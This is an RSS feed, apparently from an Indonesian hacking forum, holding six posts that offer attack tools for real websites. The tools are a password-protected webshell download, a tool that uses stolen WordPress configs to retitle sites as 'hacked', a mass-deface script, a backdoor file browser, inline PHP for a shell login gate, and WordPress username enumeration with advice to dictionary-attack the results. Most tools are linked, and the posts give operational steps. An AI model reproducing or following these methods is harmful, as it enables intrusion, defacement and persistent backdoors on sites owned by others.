<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[BackBox Indonesia - PHP Development]]></title>
		<link>https://www.backboxindonesia.or.id/</link>
		<description><![CDATA[BackBox Indonesia - https://www.backboxindonesia.or.id]]></description>
		<pubDate>Thu, 30 Apr 2026 10:04:08 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[Backbox Indonesia Web Shell v1.0 (Based on Indoxploit Shell)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-132.html</link>
			<pubDate>Fri, 27 May 2016 10:08:06 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-132.html</guid>
			<description><![CDATA[Selamat sore teman, salam sejahtera teman :D<br />
Kali ini saya akan merelease Backbox Indonesia Webshell yang berbasis Shell Indoxploit<br />
Fitur nya bisa anda cek sendiri, saya menambah beberapa tools dari shell inject serta membuat login shell dengan password hehe<br />
<br />
Penampakan:<br />
<br />
<img src="http://i.imgur.com/hiUCsVw.png" alt="[Image: hiUCsVw.png]" class="mycode_img" /><img src="http://i.imgur.com/jM7BUg1.png" alt="[Image: jM7BUg1.png]" class="mycode_img" /><img src="http://i.imgur.com/fvzZSv5.png" alt="[Image: fvzZSv5.png]" class="mycode_img" /><br />
<br />
Link: <a href="http://www.mediafire.com/download/9f9h2369q332zu9/backbox-team-shell.zip" target="_blank" class="mycode_url">Download</a><br />
<span style="font-weight: bold;" class="mycode_b">PASSWORD SHELL: <span style="color: #ff3333;" class="mycode_color">ilen12</span></span><br />
Terima kasih saya ucapkan kepada Tim Indoxploit sekali lagi karena telah memberi izin untuk merecode shell ini, jika ada yang tidak senang dengan shell ini saya siap bertanggung jawab serta menghapus shell ini<br />
NB: Maaf saya harus meng-encode shell ini, jika ada yg ingin source code nya silahkan PM saya di <a href="http://facebook.com/ilensubaron" target="_blank" class="mycode_url">Disini</a>]]></description>
			<content:encoded><![CDATA[Selamat sore teman, salam sejahtera teman :D<br />
Kali ini saya akan merelease Backbox Indonesia Webshell yang berbasis Shell Indoxploit<br />
Fitur nya bisa anda cek sendiri, saya menambah beberapa tools dari shell inject serta membuat login shell dengan password hehe<br />
<br />
Penampakan:<br />
<br />
<img src="http://i.imgur.com/hiUCsVw.png" alt="[Image: hiUCsVw.png]" class="mycode_img" /><img src="http://i.imgur.com/jM7BUg1.png" alt="[Image: jM7BUg1.png]" class="mycode_img" /><img src="http://i.imgur.com/fvzZSv5.png" alt="[Image: fvzZSv5.png]" class="mycode_img" /><br />
<br />
Link: <a href="http://www.mediafire.com/download/9f9h2369q332zu9/backbox-team-shell.zip" target="_blank" class="mycode_url">Download</a><br />
<span style="font-weight: bold;" class="mycode_b">PASSWORD SHELL: <span style="color: #ff3333;" class="mycode_color">ilen12</span></span><br />
Terima kasih saya ucapkan kepada Tim Indoxploit sekali lagi karena telah memberi izin untuk merecode shell ini, jika ada yang tidak senang dengan shell ini saya siap bertanggung jawab serta menghapus shell ini<br />
NB: Maaf saya harus meng-encode shell ini, jika ada yg ingin source code nya silahkan PM saya di <a href="http://facebook.com/ilensubaron" target="_blank" class="mycode_url">Disini</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Auto Deface Cms Wordpress melalui link Config]]></title>
			<link>https://www.backboxindonesia.or.id/thread-105.html</link>
			<pubDate>Thu, 14 Apr 2016 16:26:22 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-105.html</guid>
			<description><![CDATA[Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.<br />
<br />
jadi misalnya lu grabber configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.<br />
ngk deface sih, tapi bisa masuk mirror kok ;v<br />
<br />
jadi kita cuma masukin<span style="color: #111111;" class="mycode_color"> <span style="color: #ff3333;" class="mycode_color">http://blabla.com/configs/</span></span><br />
<br />
ada 2 file,<br />
1 file untuk websitenya.<br />
1 file untuk kita buka di cmd/terminal.<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">link_index.php</span></span><br />
<span style="color: #111111;" class="mycode_color"><a href="http://pastebin.com/7jLauxGz" target="_blank" class="mycode_url">http://pastebin.com/7jLauxGz</a></span><br />
<br />
ini nantinya yang kita buka pake cmd/terminal.<br />
php link_index.php<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">edit</span> </span>filenya ya, terutama untuk link configs, link script link_title.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">link_title_2.php</span></span><br />
<span style="color: #111111;" class="mycode_color"><a href="http://pastebin.com/9jT5Qvz5" target="_blank" class="mycode_url">http://pastebin.com/9jT5Qvz5</a></span><br />
<br />
upload diwebsite yg 1 server sama configsnya.<br />
ngk usah diedit.<br />
<br />
POC:<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #111111;" class="mycode_color"><img src="https://4.bp.blogspot.com/-BodzoiR52xU/Vw-43I6YOGI/AAAAAAAAAEE/oyNBiysnyfcOYrof7rqBBx-wj6oFj9IagCLcB/s640/aa.png" alt="[Image: aa.png]" class="mycode_img" /></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #111111;" class="mycode_color"><img src="https://2.bp.blogspot.com/-ywgi7qkhfB8/Vw-5bjllOwI/AAAAAAAAAEI/gLyF1XhDbBItIgbSerotERgLMelWOhGvgCLcB/s640/bl.png" alt="[Image: bl.png]" class="mycode_img" /></span></div>
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa cuma ganti title ?</span></span><br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa ngk deface aja ?</span></span><br />
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.<br />
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa versi cli ?</span></span><br />
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.<br />
<br />
Videonya:<br />
<span style="color: #111111;" class="mycode_color"><a href="https://www.youtube.com/watch?v=CKfRyqcXbwk" target="_blank" class="mycode_url">https://www.youtube.com/watch?v=CKfRyqcXbwk</a></span><br />
<br />
#KeepShare]]></description>
			<content:encoded><![CDATA[Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.<br />
<br />
jadi misalnya lu grabber configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.<br />
ngk deface sih, tapi bisa masuk mirror kok ;v<br />
<br />
jadi kita cuma masukin<span style="color: #111111;" class="mycode_color"> <span style="color: #ff3333;" class="mycode_color">http://blabla.com/configs/</span></span><br />
<br />
ada 2 file,<br />
1 file untuk websitenya.<br />
1 file untuk kita buka di cmd/terminal.<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">link_index.php</span></span><br />
<span style="color: #111111;" class="mycode_color"><a href="http://pastebin.com/7jLauxGz" target="_blank" class="mycode_url">http://pastebin.com/7jLauxGz</a></span><br />
<br />
ini nantinya yang kita buka pake cmd/terminal.<br />
php link_index.php<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">edit</span> </span>filenya ya, terutama untuk link configs, link script link_title.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #ff3333;" class="mycode_color">link_title_2.php</span></span><br />
<span style="color: #111111;" class="mycode_color"><a href="http://pastebin.com/9jT5Qvz5" target="_blank" class="mycode_url">http://pastebin.com/9jT5Qvz5</a></span><br />
<br />
upload diwebsite yg 1 server sama configsnya.<br />
ngk usah diedit.<br />
<br />
POC:<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #111111;" class="mycode_color"><img src="https://4.bp.blogspot.com/-BodzoiR52xU/Vw-43I6YOGI/AAAAAAAAAEE/oyNBiysnyfcOYrof7rqBBx-wj6oFj9IagCLcB/s640/aa.png" alt="[Image: aa.png]" class="mycode_img" /></span></div>
<br />
<div style="text-align: center;" class="mycode_align"><span style="color: #111111;" class="mycode_color"><img src="https://2.bp.blogspot.com/-ywgi7qkhfB8/Vw-5bjllOwI/AAAAAAAAAEI/gLyF1XhDbBItIgbSerotERgLMelWOhGvgCLcB/s640/bl.png" alt="[Image: bl.png]" class="mycode_img" /></span></div>
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa cuma ganti title ?</span></span><br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa ngk deface aja ?</span></span><br />
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.<br />
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.<br />
<br />
<span style="color: #111111;" class="mycode_color"><span style="color: #3366ff;" class="mycode_color">kenapa versi cli ?</span></span><br />
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.<br />
<br />
Videonya:<br />
<span style="color: #111111;" class="mycode_color"><a href="https://www.youtube.com/watch?v=CKfRyqcXbwk" target="_blank" class="mycode_url">https://www.youtube.com/watch?v=CKfRyqcXbwk</a></span><br />
<br />
#KeepShare]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Tool Mass Deface]]></title>
			<link>https://www.backboxindonesia.or.id/thread-100.html</link>
			<pubDate>Mon, 11 Apr 2016 04:50:11 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-100.html</guid>
			<description><![CDATA[Kali ini ane pengen bagikan script mass deface<br />
selama ini mungkin kita cuma memakainya saja.<br />
karena biasanya tool ini sudah tersedia di shell.<br />
<br />
Sebenarnya script ini cukup simple.<br />
tapi cukup bikin puyeng juga kalo belum dapet logikanya.<br />
<br />
POC:<br />
<img src="https://3.bp.blogspot.com/-_KodddXER-0/VwsP-opXCxI/AAAAAAAAAD0/RTbyaWTv9PcZfSuN7us0tDY-YWAPnxt6g/s1600/coeg.png" alt="[Image: coeg.png]" class="mycode_img" /><br />
<br />
Script:<br />
<a href="http://pastebin.com/SA7uKgiQ" target="_blank" class="mycode_url">http://pastebin.com/SA7uKgiQ</a><br />
<br />
<br />
#KeepShare]]></description>
			<content:encoded><![CDATA[Kali ini ane pengen bagikan script mass deface<br />
selama ini mungkin kita cuma memakainya saja.<br />
karena biasanya tool ini sudah tersedia di shell.<br />
<br />
Sebenarnya script ini cukup simple.<br />
tapi cukup bikin puyeng juga kalo belum dapet logikanya.<br />
<br />
POC:<br />
<img src="https://3.bp.blogspot.com/-_KodddXER-0/VwsP-opXCxI/AAAAAAAAAD0/RTbyaWTv9PcZfSuN7us0tDY-YWAPnxt6g/s1600/coeg.png" alt="[Image: coeg.png]" class="mycode_img" /><br />
<br />
Script:<br />
<a href="http://pastebin.com/SA7uKgiQ" target="_blank" class="mycode_url">http://pastebin.com/SA7uKgiQ</a><br />
<br />
<br />
#KeepShare]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[PHP] Salah satu tool di backdoor (untuk melihat files dan folders di Dir)]]></title>
			<link>https://www.backboxindonesia.or.id/thread-88.html</link>
			<pubDate>Sat, 26 Mar 2016 09:03:34 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-88.html</guid>
			<description><![CDATA[hallo.<br />
kali ini ane pengen share salah satu fitur yg byk digunakan di backdoor.<br />
<br />
kalo ente pernah liat<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><span style="font-size: small;" class="mycode_size"><span style="color: #333333;" class="mycode_color"> </span></span><span style="color: #99cc99;" class="mycode_color"><span style="font-size: small;" class="mycode_size">/home/user/public_html/anu/</span></span><br />
</span>terus ente klik salah satunya abis itu muncul deh file dan folder dalam dir tersebut.<br />
nah ane pengen share itu.<br />
<br />
keliatannya sih sederhana.<br />
tapi cukup bikin ane puyeng juga.<br />
pertama ane kira gampang, ane coba buat ternyata lumayan sulit.<br />
<br />
sebenarnya ada cara yang lebih mudah.<br />
tapi ntah kenapa lebih enakan pake punya sendiri.<br />
Mungkin bisa dicoba di localhost atau site yang udah ketanem shell.<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<br />
<span style="font-size: small;" class="mycode_size"><span style="color: #ff33cc;" class="mycode_color"><span style="text-decoration: underline;" class="mycode_u">ya seengkanya kita tau-lah cara kerjanya. ngk cuma make doang.</span></span><br />
</span><br />
</span>Script:<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<a href="http://pastebin.com/fU9pGFWx" target="_blank" class="mycode_url"><span style="color: #333333;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="color: #0782c1;" class="mycode_color">http://pastebin.com/fU9pGFWx</span></span></span></a></span><br />
<br />
SS:<span style="color: #333333;" class="mycode_color"><span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<span style="font-size: small;" class="mycode_size"><img src="http://www.bastianimacchine.it/a.png" alt="[Image: a.png]" class="mycode_img" /></span></span></span>]]></description>
			<content:encoded><![CDATA[hallo.<br />
kali ini ane pengen share salah satu fitur yg byk digunakan di backdoor.<br />
<br />
kalo ente pernah liat<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><span style="font-size: small;" class="mycode_size"><span style="color: #333333;" class="mycode_color"> </span></span><span style="color: #99cc99;" class="mycode_color"><span style="font-size: small;" class="mycode_size">/home/user/public_html/anu/</span></span><br />
</span>terus ente klik salah satunya abis itu muncul deh file dan folder dalam dir tersebut.<br />
nah ane pengen share itu.<br />
<br />
keliatannya sih sederhana.<br />
tapi cukup bikin ane puyeng juga.<br />
pertama ane kira gampang, ane coba buat ternyata lumayan sulit.<br />
<br />
sebenarnya ada cara yang lebih mudah.<br />
tapi ntah kenapa lebih enakan pake punya sendiri.<br />
Mungkin bisa dicoba di localhost atau site yang udah ketanem shell.<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<br />
<span style="font-size: small;" class="mycode_size"><span style="color: #ff33cc;" class="mycode_color"><span style="text-decoration: underline;" class="mycode_u">ya seengkanya kita tau-lah cara kerjanya. ngk cuma make doang.</span></span><br />
</span><br />
</span>Script:<span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<a href="http://pastebin.com/fU9pGFWx" target="_blank" class="mycode_url"><span style="color: #333333;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="color: #0782c1;" class="mycode_color">http://pastebin.com/fU9pGFWx</span></span></span></a></span><br />
<br />
SS:<span style="color: #333333;" class="mycode_color"><span style="font-family: Tahoma, sans-serif, Arial, Verdana, 'Trebuchet MS';" class="mycode_font"><br />
<span style="font-size: small;" class="mycode_size"><img src="http://www.bastianimacchine.it/a.png" alt="[Image: a.png]" class="mycode_img" /></span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Membuat password enc sendiri]]></title>
			<link>https://www.backboxindonesia.or.id/thread-56.html</link>
			<pubDate>Sun, 13 Mar 2016 09:58:13 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-56.html</guid>
			<description><![CDATA[<div class="codeblock phpcodeblock"><div class="title">PHP Code:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">&lt;?php<br />error_reporting</span><span style="color: #007700">();<br /></span><span style="color: #0000BB">session_start</span><span style="color: #007700">();<br /><br /></span><span style="color: #0000BB">&#36;password&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"ec:550dfdef89bed03f550dfdef89bed03f"</span><span style="color: #007700">;&nbsp;</span><span style="color: #FF8000">//&nbsp;123<br /><br /></span><span style="color: #007700">function&nbsp;</span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">,</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">){<br /></span><span style="color: #0000BB">&#36;jum_key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;jum_key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;jum_key</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc_1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">18</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc_2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">17</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;hasil&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">&#36;jum_key</span><span style="color: #DD0000">:"</span><span style="color: #007700">.</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc_1</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">16</span><span style="color: #007700">).</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc_1</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">16</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">&#36;hasil</span><span style="color: #007700">==</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">){<br />return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />}else{<br />return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />}<br />}<br /><br />if(</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Passalt7'</span><span style="color: #007700">]){<br /></span><span style="color: #0000BB">&#36;cek&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'password'</span><span style="color: #007700">],</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">&#36;cek</span><span style="color: #007700">){<br /></span><span style="color: #0000BB">&#36;_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">"login"</span><span style="color: #007700">]=</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'password'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">header</span><span style="color: #007700">(</span><span style="color: #DD0000">'Location:&nbsp;?'</span><span style="color: #007700">);<br />}else{<br />echo&nbsp;</span><span style="color: #DD0000">"gagal"</span><span style="color: #007700">;<br />}<br />}<br /><br />if(!isset(</span><span style="color: #0000BB">&#36;_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">"login"</span><span style="color: #007700">])){<br /></span><span style="color: #0000BB">?&gt;<br /></span>&lt;!DOCTYPE&nbsp;html&gt;<br />&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;Login&nbsp;Page&lt;/title&gt;<br />&lt;/head&gt;<br />&lt;body&gt;<br />&lt;form&nbsp;action=""&nbsp;method="post"&gt;<br />&lt;input&nbsp;type="text"&nbsp;name="password"&gt;<br />&lt;input&nbsp;type="submit"&nbsp;name="Passalt7"&gt;<br />&lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;<br /><span style="color: #0000BB">&lt;?php<br /></span><span style="color: #007700">}else{<br />echo&nbsp;</span><span style="color: #DD0000">"HALOOO"</span><span style="color: #007700">;<br />}<br /></span><span style="color: #0000BB">?&gt;</span></code></div></div></div>di atas adalah salah satu password enc modifan yang di ambil dari enc md5 dan biasa di kreasikan lagi sesuai dengan suasana hati.]]></description>
			<content:encoded><![CDATA[<div class="codeblock phpcodeblock"><div class="title">PHP Code:</div><div class="body"><div dir="ltr"><code><span style="color: #0000BB">&lt;?php<br />error_reporting</span><span style="color: #007700">();<br /></span><span style="color: #0000BB">session_start</span><span style="color: #007700">();<br /><br /></span><span style="color: #0000BB">&#36;password&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"ec:550dfdef89bed03f550dfdef89bed03f"</span><span style="color: #007700">;&nbsp;</span><span style="color: #FF8000">//&nbsp;123<br /><br /></span><span style="color: #007700">function&nbsp;</span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">,</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">){<br /></span><span style="color: #0000BB">&#36;jum_key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;key</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;jum_key&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;jum_key</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">2</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc_1&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">18</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;enc_2&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">17</span><span style="color: #007700">);<br /></span><span style="color: #0000BB">&#36;hasil&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">&#36;jum_key</span><span style="color: #DD0000">:"</span><span style="color: #007700">.</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc_1</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">16</span><span style="color: #007700">).</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;enc_1</span><span style="color: #007700">),</span><span style="color: #0000BB">0</span><span style="color: #007700">,</span><span style="color: #0000BB">16</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">&#36;hasil</span><span style="color: #007700">==</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">){<br />return&nbsp;</span><span style="color: #0000BB">true</span><span style="color: #007700">;<br />}else{<br />return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;<br />}<br />}<br /><br />if(</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'Passalt7'</span><span style="color: #007700">]){<br /></span><span style="color: #0000BB">&#36;cek&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">login</span><span style="color: #007700">(</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'password'</span><span style="color: #007700">],</span><span style="color: #0000BB">&#36;password</span><span style="color: #007700">);<br />if(</span><span style="color: #0000BB">&#36;cek</span><span style="color: #007700">){<br /></span><span style="color: #0000BB">&#36;_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">"login"</span><span style="color: #007700">]=</span><span style="color: #0000BB">&#36;_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'password'</span><span style="color: #007700">];<br /></span><span style="color: #0000BB">header</span><span style="color: #007700">(</span><span style="color: #DD0000">'Location:&nbsp;?'</span><span style="color: #007700">);<br />}else{<br />echo&nbsp;</span><span style="color: #DD0000">"gagal"</span><span style="color: #007700">;<br />}<br />}<br /><br />if(!isset(</span><span style="color: #0000BB">&#36;_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">"login"</span><span style="color: #007700">])){<br /></span><span style="color: #0000BB">?&gt;<br /></span>&lt;!DOCTYPE&nbsp;html&gt;<br />&lt;html&gt;<br />&lt;head&gt;<br />&lt;title&gt;Login&nbsp;Page&lt;/title&gt;<br />&lt;/head&gt;<br />&lt;body&gt;<br />&lt;form&nbsp;action=""&nbsp;method="post"&gt;<br />&lt;input&nbsp;type="text"&nbsp;name="password"&gt;<br />&lt;input&nbsp;type="submit"&nbsp;name="Passalt7"&gt;<br />&lt;/form&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;<br /><span style="color: #0000BB">&lt;?php<br /></span><span style="color: #007700">}else{<br />echo&nbsp;</span><span style="color: #DD0000">"HALOOO"</span><span style="color: #007700">;<br />}<br /></span><span style="color: #0000BB">?&gt;</span></code></div></div></div>di atas adalah salah satu password enc modifan yang di ambil dari enc md5 dan biasa di kreasikan lagi sesuai dengan suasana hati.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[cara mengetahui username pada wordpress]]></title>
			<link>https://www.backboxindonesia.or.id/thread-55.html</link>
			<pubDate>Sun, 13 Mar 2016 09:18:54 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-55.html</guid>
			<description><![CDATA[merawanin nih sub  :cool:<br />
<br />
kali ini ane pengen share cara mengetahui username pada wordpress.<br />
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.<br />
<br />
cukup simple sih.<br />
pada kali ini cuma menampilkan username + name dari id 1-10.<br />
kalo mau sampe 20, ubah aja &#36;id yang didalem for.<br />
<br />
POC:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://www.bastianimacchine.it/libraries/cms/html/author.png" alt="[Image: author.png]" class="mycode_img" /></div>
<br />
jadi ini cuma menampilkan id yg ada username + namenya aja.<br />
setelah mengetahui usernamenya, silahkan di dictionary attack.<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>script:<br />
<a href="http://pastebin.com/AqCmhr2Y" target="_blank" class="mycode_url">http://pastebin.com/AqCmhr2Y</a></blockquote>
]]></description>
			<content:encoded><![CDATA[merawanin nih sub  :cool:<br />
<br />
kali ini ane pengen share cara mengetahui username pada wordpress.<br />
ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.<br />
<br />
cukup simple sih.<br />
pada kali ini cuma menampilkan username + name dari id 1-10.<br />
kalo mau sampe 20, ubah aja &#36;id yang didalem for.<br />
<br />
POC:<br />
<br />
<div style="text-align: center;" class="mycode_align"><img src="http://www.bastianimacchine.it/libraries/cms/html/author.png" alt="[Image: author.png]" class="mycode_img" /></div>
<br />
jadi ini cuma menampilkan id yg ada username + namenya aja.<br />
setelah mengetahui usernamenya, silahkan di dictionary attack.<br />
<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>script:<br />
<a href="http://pastebin.com/AqCmhr2Y" target="_blank" class="mycode_url">http://pastebin.com/AqCmhr2Y</a></blockquote>
]]></content:encoded>
		</item>
	</channel>
</rss>